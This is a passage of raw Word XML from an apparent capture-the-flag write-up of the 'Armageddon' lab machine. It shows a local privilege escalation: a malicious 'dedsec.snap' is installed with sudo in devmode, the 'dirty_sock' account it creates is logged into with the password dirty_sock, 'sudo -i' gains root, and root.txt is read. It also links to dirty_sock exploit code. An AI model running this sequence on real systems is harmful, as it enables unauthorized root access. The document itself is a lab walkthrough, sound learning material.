        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E09E4">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E09E4">
        <w:t xml:space="preserve">]$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E09E4">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E09E4">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E09E4">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E09E4">
        <w:t>/bin/snap install --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E09E4">
        <w:t>devmode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E09E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E09E4">
        <w:t>dedsec.snap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009E09E4" w:rsidRDefault="00B42F8A" w:rsidP="00CB5427">
      <w:r w:rsidRPr="00B42F8A">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B42F8A">
        <w:t>brucetherealadmin@armageddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B42F8A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B42F8A">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B42F8A">
        <w:t xml:space="preserve">]$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B42F8A">
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B42F8A">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B42F8A">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B42F8A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B42F8A">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B42F8A" w:rsidRDefault="00B42F8A" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79394D76" wp14:editId="7AC8EAB7">
            <wp:extent cx="5731510" cy="33210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8A" w:rsidRDefault="00B42F8A" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00B42F8A" w:rsidRDefault="00E14B3C" w:rsidP="00CB5427">
      <w:r>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirty_sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E14B3C" w:rsidRDefault="00E14B3C" w:rsidP="00CB5427">
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirty_sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E14B3C" w:rsidRDefault="00E14B3C" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00E14B3C" w:rsidRDefault="00E14B3C" w:rsidP="00CB5427">
      <w:r w:rsidRPr="00E14B3C">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t>brucetherealadmin@armageddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t xml:space="preserve">]$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t>dirty_sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E14B3C" w:rsidRDefault="00E14B3C" w:rsidP="00CB5427">
      <w:r w:rsidRPr="00E14B3C">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t>dirty_sock@armageddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t xml:space="preserve">]$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E14B3C">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E14B3C" w:rsidRDefault="00E14B3C" w:rsidP="00E14B3C">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@armageddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ~]# </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B3C" w:rsidRDefault="00E14B3C" w:rsidP="00E14B3C">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@armageddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ~]# </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B3C" w:rsidRDefault="00E14B3C" w:rsidP="00E14B3C"/>
    <w:p w:rsidR="00E14B3C" w:rsidRDefault="00E14B3C" w:rsidP="00E14B3C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="355A1AEA" wp14:editId="70FFB19E">
            <wp:extent cx="5257800" cy="25622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B3C" w:rsidRDefault="00E14B3C" w:rsidP="00E14B3C"/>
    <w:p w:rsidR="00E14B3C" w:rsidRDefault="00E14B3C" w:rsidP="00E14B3C">
      <w:r>
        <w:t xml:space="preserve">Root.txt: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14B3C">
        <w:t>7e815792cbddaf2</w:t>
      </w:r>
      <w:r w:rsidR="00F2100B">
        <w:t>XXXXXXXXXXXXXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00092D0D" w:rsidRDefault="00092D0D" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00092D0D" w:rsidRDefault="00092D0D" w:rsidP="00CB5427"/>
    <w:sectPr w:rsidR="00092D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989"/>
    <w:rsid w:val="000912A9"/>
    <w:rsid w:val="00092D0D"/>
    <w:rsid w:val="000A3241"/>
    <w:rsid w:val="000F3676"/>
    <w:rsid w:val="001445CC"/>
    <w:rsid w:val="00174641"/>
    <w:rsid w:val="001803EC"/>
    <w:rsid w:val="00191151"/>
    <w:rsid w:val="0026152C"/>
    <w:rsid w:val="00281838"/>
    <w:rsid w:val="002950BD"/>
    <w:rsid w:val="00295FC0"/>
    <w:rsid w:val="002A29BB"/>
    <w:rsid w:val="002B2EE5"/>
    <w:rsid w:val="00303989"/>
    <w:rsid w:val="003D7FC9"/>
    <w:rsid w:val="003E62E7"/>
    <w:rsid w:val="003E72B4"/>
    <w:rsid w:val="00441AF6"/>
    <w:rsid w:val="00441EF3"/>
    <w:rsid w:val="004441EB"/>
    <w:rsid w:val="004C1574"/>
    <w:rsid w:val="004E43AE"/>
    <w:rsid w:val="005D556C"/>
    <w:rsid w:val="00627ABA"/>
    <w:rsid w:val="006562AC"/>
    <w:rsid w:val="006E57CD"/>
    <w:rsid w:val="00704F96"/>
    <w:rsid w:val="00724A98"/>
    <w:rsid w:val="00736362"/>
    <w:rsid w:val="00755860"/>
    <w:rsid w:val="00780ADD"/>
    <w:rsid w:val="007F63DF"/>
    <w:rsid w:val="0083143B"/>
    <w:rsid w:val="00863564"/>
    <w:rsid w:val="00880D27"/>
    <w:rsid w:val="00884C96"/>
    <w:rsid w:val="00885407"/>
    <w:rsid w:val="008B0CCD"/>
    <w:rsid w:val="008B5612"/>
    <w:rsid w:val="008F4A78"/>
    <w:rsid w:val="0090449B"/>
    <w:rsid w:val="009338F0"/>
    <w:rsid w:val="0095595B"/>
    <w:rsid w:val="009E09E4"/>
    <w:rsid w:val="00A15AAC"/>
    <w:rsid w:val="00A238BC"/>
    <w:rsid w:val="00AC6106"/>
    <w:rsid w:val="00B26765"/>
    <w:rsid w:val="00B42F8A"/>
    <w:rsid w:val="00B67D0B"/>
    <w:rsid w:val="00B805D7"/>
    <w:rsid w:val="00B819D8"/>
    <w:rsid w:val="00BA1C11"/>
    <w:rsid w:val="00BB7787"/>
    <w:rsid w:val="00BE0583"/>
    <w:rsid w:val="00C13507"/>
    <w:rsid w:val="00C30458"/>
    <w:rsid w:val="00C43DD2"/>
    <w:rsid w:val="00C74A51"/>
    <w:rsid w:val="00CB5427"/>
    <w:rsid w:val="00CC5D9D"/>
    <w:rsid w:val="00CE2CD6"/>
    <w:rsid w:val="00D320B1"/>
    <w:rsid w:val="00D6361C"/>
    <w:rsid w:val="00D808B4"/>
    <w:rsid w:val="00E14B3C"/>
    <w:rsid w:val="00E9475A"/>
    <w:rsid w:val="00EA0FBF"/>
    <w:rsid w:val="00ED54A9"/>
    <w:rsid w:val="00F133B6"/>
    <w:rsid w:val="00F2100B"/>
    <w:rsid w:val="00F21C30"/>
    <w:rsid w:val="00F75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556E0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{28E7E93D-4283-4410-B12C-5626A7656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4F96"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="hw">
    <w:name w:val="hw"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="007363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y">
    <w:name w:val="hy"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B805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47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github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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hyperlink" Target="http://10.10.10.233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mailto:brucetherealadmin@10.10.10.233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hyperlink" Target="https://gitlab.com/tamilcode/dirty-sock-exploit/-/blob/main/dirty_sock_exploit" TargetMode="External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17</Pages>
  <Words>501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dixit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>107</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-22T04:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-23T10:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>